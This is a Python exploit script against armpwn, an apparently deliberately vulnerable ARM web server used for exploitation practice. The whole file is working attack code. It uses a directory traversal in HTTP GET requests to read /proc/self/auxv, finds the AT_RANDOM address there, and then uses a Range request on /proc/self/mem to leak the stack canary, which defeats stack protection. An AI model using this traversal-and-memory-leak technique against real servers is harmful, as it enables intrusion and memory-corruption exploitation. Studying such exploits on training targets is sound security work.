armpwn_leak_canary.py

#!/usr/bin/env python
#
# Leaking the canary value of the armpwn binary, thanks to Directory Traversal
#
# @_hugsy_
#
# armpwn was created/maintained by @5aelo
#
from __future__ import print_function
import socket, struct

HOST, PORT = "rpi2-1", 80
AT_RANDOM = 25

s = socket.socket()
s.connect((HOST, PORT))
print("[+] Connected")

print("[+] Leaking AUVX")
s.send("GET ../../../../../proc/self/auxv HTTP/1.0\r\n\r\n")
data = s.recv(1024)
i = data.find('\r\n'*2)
data = data[i+4:]
at_random_address = None
for i in range(0, len(data), 8):
    code = struct.unpack("<I", data[i:i+4])[0]
    if code==AT_RANDOM:
        value = struct.unpack("<I", data[i+4:i+8])[0]
        at_random_address = value
        break

if at_random_address is None:
    print("[-] not found")
    exit(1)
print("[+] AT_RANDOM={:#x}".format(at_random_address))

print("[+] Forging HTTP request using Range")
m = "GET ../../../../../proc/self/mem HTTP/1.0\r\n"
m+= "Range: bytes={:d}-{:d}\r\n\r\n".format(at_random_address,at_random_address+16)
s.send(m)
data = s.recv(1024)
i = data.find('\r\n'*2)
data = data[i+4:]
canary = struct.unpack("<I", data[:4])[0]
canary &= 0xffffff00
print("[+] Canary is {:#x}".format(canary))
s.close()